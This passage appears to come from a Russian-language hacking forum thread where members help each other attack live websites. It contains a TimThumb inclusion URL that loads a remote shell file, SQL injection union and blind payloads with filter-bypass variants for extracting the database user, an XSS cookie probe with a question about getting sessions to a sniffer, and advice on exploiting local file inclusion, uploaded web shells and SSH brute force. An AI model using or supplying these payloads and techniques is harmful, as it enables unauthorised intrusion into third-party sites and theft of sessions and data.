Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Ахах, бро. А ты уверен, что шелл на твоем сервере не выполняется, а выдает соурс?
     
  2. Sidarovich1975

    Joined:
    4 Oct 2009
    Messages:
    60
    Likes Received:
    16
    Reputations:
    7
    Тебе нужен не выполненный php скрипт, а сорцы т.е. ты когда заходишь на http://site.com/index.php , где index.php содержит :
    PHP:
    <?php echo привет?>
    ты видишь слово "привет", т.е. результат скрипта, а не сорцы => попробуй :
    PHP:
    /wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.txt
    Или нужно, чтоб у тебя в настройках http://blogger.com.site.com/ не исполнялиь php-скрипты (другой хостинг, типа narod.ru)
    Другими словами если ты зайдешь на http://site.narod.ru/index.php , с тем же содержанием ты увидишь не исполненный скрипт, а собственно сорцы:
    PHP:
    <?php echo привет?>
     
  3. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Друг, ниочем написал. Где ты видел такое:
    PHP:
    <?php echo привет?>
    ???
    Надо в кавычки брать =))
     
  4. Sidarovich1975

    Joined:
    4 Oct 2009
    Messages:
    60
    Likes Received:
    16
    Reputations:
    7
    одно слово и без кавычек работает...
    а ниочем это для тебя, т.к. ты это знаешь, а для того кто не знает нужно описывать подробно, чтоб понятно было с примерами... хотя может и дурацкими:)
     
    #20564 Sidarovich1975, 13 Jun 2012
    Last edited: 13 Jun 2012
    1 person likes this.
  5. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    Если уж ты даёшь советы, да ещё даёшь советы тем кто даёт советы о том как правильно давать советы, посмотри на вопрос : "Word press TimThumb"
    Если ты понятия не имеешь о чём речь, зачем твои советы по поводу народа и .txt расширения, да ещё рассуждения о том как нужно советовать?
     
    1 person likes this.
  6. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    /index.php?artid=30 and 1=2 - ошибко
    /index.php?artid=30 and 1=1 - норм
    /index.php?artid=30 select - нормал
    /index.php?artid=30 UniON - страничка пугалка а.к.а "за вамы уже выехали"
    остается тока крутить как блинд? отчета об ошибки нету
     
  7. Metho

    Metho New Member

    Joined:
    18 Nov 2011
    Messages:
    182
    Likes Received:
    2
    Reputations:
    0
    залил все таки шелл на поддомен, все ок, но возникла проблема. сайт на другом ипе, основной. можно ли через поддомен пробраться к сайту?
     
  8. Dad69

    Dad69 New Member

    Joined:
    16 Oct 2011
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Есть сайт на Drupal.Раньше спокойно приходили куки, но после его обновления перестало приходить id сессии вида "SESSd9cc53338c9b7991787e099f00cbe150"-к примеру.
    Знаю что дело не в сниффере ибо при вводе <script>javascript:alert(document.cookie)</script> id тоже нет
    Зато сессию можно просмотреть в куках браузера
    И как же мне получить эту сессию на сниффер??Сорри на нубство
     
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Возможно что основной сайт написан на том что и сайт на поддомене, если залил шелл попробуй поискать баги в коде и применить их на основном домине, у меня бывали такие случии что прокатывало...
     
    _________________________
  10. briz

    briz New Member

    Joined:
    13 Nov 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Подскажите, пожалуйста, нубу.. Каким образом дампится блинд sql скуль? знаю количество столбцов, имя бд, таблицы и столбцов.. Попробовал несколько паблик прог - не катит..
     
  11. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to briz
    rsaUnDumper, sqlmap, toolza
    Да много еще, Вы, молодой человек, плохо искали!
     
  12. RuDefc0n

    RuDefc0n Member

    Joined:
    2 Jun 2012
    Messages:
    33
    Likes Received:
    8
    Reputations:
    0
    Столкнулся с проблемой:
    1) Есть 2 сервера, которые как-то слинкованы между собой - т.е. с одного можно читать файлы другого и наоборот.
    2) Найдена функция позволяющая читать содержимое файла и вот хз, что это. Скорее всего релинковка через htaccess
    3) Добрался до конфигов, кроме httpd, логи же вообще читать не позволяет, хотя установил место-положение.
    4) Пути до 2 сервера не могу найти ну вообще никак - логический перебор названий ни к чему не привел, при этом раскрытия путей точно нет. Читать из веба файлы он отказывается, что делать?
    5) Файлы судя по всему хранятся не по тому адресу, что показываются - как результат напрямую запросить залитый шелл не могу, и логический перебор опять же не помог.

    Что можно сделать? Куда копать? Имеет ли смысл вообще раскручивать этот способ или браться за поиск других ошибок?

    PS /proc/sys/ и етк спокойно читаются.

    PS это дебиан -_-
     
    #20572 RuDefc0n, 17 Jun 2012
    Last edited: 17 Jun 2012
  13. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    посимвольно,через вывод ошибок...
     
    _________________________
    3 people like this.
  14. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,5+--+
    http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,user()+--+

    Как боротся?
     
  15. RuDefc0n

    RuDefc0n Member

    Joined:
    2 Jun 2012
    Messages:
    33
    Likes Received:
    8
    Reputations:
    0
    Собственно интересно как можно оказаться воздействие на переменные окружения при:
    APACHE_PID_FILE=/var/run/apache2.pid
    APACHE_RUN_USER=www-data
    PATH=/usr/local/bin:/usr/bin:/bin
    PWD=/
    APACHE_RUN_GROUP=www-data
    LANG=C
    SHLVL=1
    _=/usr/sbin/apache2
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Pirotexnik

    aes_decrypt(aes_encrypt(user()))

    RuDefc0n

    там нету переменных окружения. следовательно никак не можете. если я правильно понял у вас LFI с /proc/self/environ
     
    _________________________
    #20576 Konqi, 17 Jun 2012
    Last edited: 17 Jun 2012
  17. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605


    http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,unhex(hex(user()))+--+
     
    _________________________
  18. RuDefc0n

    RuDefc0n Member

    Joined:
    2 Jun 2012
    Messages:
    33
    Likes Received:
    8
    Reputations:
    0
    По сути полноценный lfi, только вот он читает файлы, а не запускает. Логи почитать не дает + реальный путь никак не вытащить до папки, где нахожусь - разве что перебором, но нативный логический перебор не помог.
    Кучу конфигов уже перечитал. Судя по всему конкретно в той папке откуда обычно читает не исполняются файлы. Пока из всего только остается брутить ssh, но это наркоманство.
     
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    по информации из environ видно что там наверняка дебиан бейсд дистро какой то (debian/ubuntu), пробовал читать /etc/apache2/conf/apache2.conf ? там спалишь пути к htdocs, а дальше читаем скрипты..
     
    _________________________
  20. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Что-то я не врубился О_0
    -1110+union+select+1,2,3,4,aes_decrypt(aes_encrypt(user()))+--+
    -1110+union+select+1,2,3,4,unhex(hex(user()))+--+
    Что за?
     
Thread Status:
Not open for further replies.